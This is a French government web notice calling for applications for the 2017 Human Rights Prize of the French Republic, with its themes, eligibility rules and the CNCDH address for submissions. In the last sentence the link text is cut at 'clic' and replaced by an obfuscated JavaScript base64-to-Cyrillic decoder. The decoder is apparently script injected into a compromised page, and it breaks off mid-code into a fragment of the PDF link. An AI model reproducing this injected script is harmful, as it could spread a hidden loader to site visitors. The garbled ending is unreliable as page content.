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Call for applications - 2017 Human Rights Prize of the French Republic
Call for applications - 2017 Human Rights Prize of the French Republic
Par Ministère de l'Europe et des affaires étrangères
Le 06/04/2018
#ONG, #CNCDH, #Droits de l'Homme
Applications are now open for the 2017 “Liberty, Equality, Fraternity” Human Rights Prize of the French Republic, awarded by the Prime Minister of the French Government.
This Prize is awarded to non-governmental organizations (NGOs) and individual candidates, regardless of nationality and borders, which present a field initiative or project to be implemented in France or abroad, on one of the two themes for 2017: freedom of information, freedom of the press and journalism or promotion and protection of sexual and reproductive rights.
The prize regulations and the application form can be found on the CNCDH website: .
Candidates must submit their complete application, before the deadline of 15 October 2017, to the Secretariat-General of the CNCDH:
35, rue Saint-Dominique – 75007 Paris – France
or by email to:
For more information and to download the application form, clic function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandidature%202017.pdf">here